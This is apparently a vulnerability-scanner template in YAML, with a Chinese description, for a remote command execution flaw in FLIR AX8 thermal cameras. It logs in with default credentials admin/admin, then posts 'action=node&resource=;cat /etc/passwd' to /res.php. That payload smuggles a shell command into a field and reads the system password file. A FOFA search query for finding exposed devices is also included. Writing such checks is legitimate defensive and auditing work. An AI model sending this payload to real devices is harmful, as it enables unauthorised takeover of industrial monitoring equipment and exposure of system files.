id: flir-ax8-res-php-rce

info:
  name: FLIR-AX8 res.php 后台命令执行漏洞
  author: daffainfo
  severity: critical
  verified: true
  description: |
    FLIR AX8将红外热像仪、可见光相机集成入一种结构小巧、经济实惠的架构中，为关键机电设备的无间断状态监控提供连续的温度监控报警。FLIR AX8系统存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限。
    fofa-query: app="FLIR-FLIR-AX8"
  reference:
    - https://mp.weixin.qq.com/s/KT3vLg49I61_j6Q7Rx6Mhg

rules:
  r0:
    request:
      method: POST
      path: /login/dologin
      body: "user_name=admin&user_password=admin"
    expression: response.status == 200 && response.body.bcontains(b'"success"')
  r1:
    request:
      method: POST
      path: /res.php
      body: "action=node&resource=;cat /etc/passwd"
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()